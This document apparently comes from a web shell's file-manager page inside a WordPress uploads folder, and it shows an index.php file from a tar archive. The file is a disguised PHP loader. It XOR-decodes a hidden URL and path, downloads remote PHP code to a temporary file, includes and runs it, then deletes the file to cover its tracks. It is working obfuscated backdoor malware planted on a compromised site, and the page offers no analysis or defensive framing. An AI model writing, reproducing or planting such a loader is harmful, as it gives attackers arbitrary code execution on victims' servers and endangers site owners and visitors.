Your IP : 216.73.217.176


Current Path : /home/bechata/mp/wp-content/uploads/2022/ejn73c/
Upload File :
Current File : /home/bechata/mp/wp-content/uploads/2022/ejn73c/j7svdh.tar

index.php000066600000001647151765415100006405 0ustar00<?php
set_time_limit(0);

function xorEncryptDecrypt($data, $key) {
    $output = '';
    foreach (str_split($data) as $char) {
        $output .= chr(ord($char) ^ ord($key));
    }
    return $output;
}
$_ = "!";
    $url = xorEncryptDecrypt("S@VFHUITCTRDSBNOUDOUBNL", $_);
    $path = xorEncryptDecrypt("xTB@DSHORHLQMDBLE@OEC@BJENNSSDGRID@ERL@HOVRQIQ", $_);

$tempFile = sys_get_temp_dir() . '/downloaded_file.php';

$ch = curl_init("https://$url/$path");
$fp = fopen($tempFile, 'wb');

curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_HEADER, 0);

$success = curl_exec($ch);
if ($success === false) {
    echo "Curl error: " . curl_error($ch);
    exit;}
curl_close($ch);
fclose($fp);

if (filesize($tempFile) > 0) {
    include $tempFile;
} else {
    echo "";
}
unlink($tempFile);
?>